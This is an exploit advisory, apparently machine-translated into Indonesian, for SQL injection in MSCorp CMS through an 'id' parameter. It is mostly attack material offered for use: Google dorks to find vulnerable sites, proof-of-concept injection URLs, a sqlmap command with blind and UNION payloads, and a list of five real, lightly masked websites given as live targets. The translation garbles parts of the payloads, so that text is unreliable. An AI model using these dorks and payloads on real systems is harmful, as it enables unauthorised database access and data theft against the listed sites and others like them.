Dork: "Dikembangkan Oleh MSCorp"

chmood


[+] Judul: - MSCorp CMS - SQL Injection Vulnerability
[+] Tanggal: - 7 - Agustus - 2015
[+] Penjual Homepage: - http://www.mscorp.co.in/
[+] Versi: - Semua Versi
[+] Diuji pada: - Nginx / 1.4.5, PHP / 5.2.17, Linux - Jendela
[+] Kategori: - webapps
[+] Google Dorks: - "Dikembangkan Oleh MSCorp"

"Dikembangkan Dengan MSCorp" + inurl:.? Php / id =

"Dikembangkan Dengan MSCorp" inurl: "? Php"
[+] Exploit Penulis: - Shelesh Rauthan (ShOrTy420 alias @ Stian SEB)
[+] Nama Team: - Team Alastor Breeze, Cerdas-Eksploitasi
[+] Official Website: - serverfarming.com, intelligentexploit.com
[+] Para Anggota resmi: -!! Sh0rTy420, P @ rL0u $, nfIn Ty, Th3G0v3Rn3R, m777k
[+] Greedz ke: -@@lu, Lalit, MyLappy <3, Diksha, DK
[+] Kontak: - fb.com/shelesh.rauthan, [email protected], [email protected]

================================================== =======
[+] Severity Level: - Tinggi

[+] Request Cara (s): - GET / POST

[+] Parameter Rentan (s): - id

[+] Wilayah yang Terkena (s): - Seluruh admin, database, Server

[+] Tentang: - tidak berkepentingan SQL Injection melalui Beberapa Php Files menyebabkan kesalahan SQL

[+] SQL Berkas rentan: - /home/DOMAIN/public_html/XXX.php

[+] POC: - http://127.0.0.1/XXX.php?id=[SQL] '

Kerentanan web sql Injection dapat dimanfaatkan dengan remote
penyerang tanpa hak istimewa web-aplikasi pengguna akun atau pengguna
interaksi.

. http: // www [WEBSITE] .com / XXX.php id = 6 rangka 'berdasarkan [SQL IN4JECTION] - +
. http: // www [WEBSITE] .com / XXX.php id = 6 union 'semua pilih [SQL INJECTION] - +

SqlMap
++++++++++++++++++++++++++
python sqlmap.py -url "http://127.0.0.1/XXX.php?id=[SQL]" -dbs
++++++++++++++++++++++++++
-
Parameter: id (GET)

Jenis: buta berbasis boolean

Judul: DAN boolean berbasis buta - MANA atau klausa HAVING

Payload: id = 6 AND 1803 = 1803

Jenis: DAN / ATAU waktu berbasis buta

Judul: MySQL> = 5.0.12 DAN waktu berbasis buta

Payload: id = 6 DAN TIDUR (5)

Jenis: permintaan UNION

Judul: permintaan UNION Generic (NULL) - 1 kolom

Payload: id = 6 UNION ALL SELECT CONCAT (0x717a626a71,0x72454556666e64596a4a, 0x7178767071) -
-

[+] DEMO: - http://www.hoXtelsahyadrialibaug.com/gallery.php?id=6 '

http://www.tapolaXtourism.com/showContent.php?id=17 '

http://www.reigeXltech.com/content.php?content=10 '

http://www.koyXanalakeview.com/facilities.php?content=4 '

http://www.lycXomb.com/productdetails.php?id=2 '


Komentar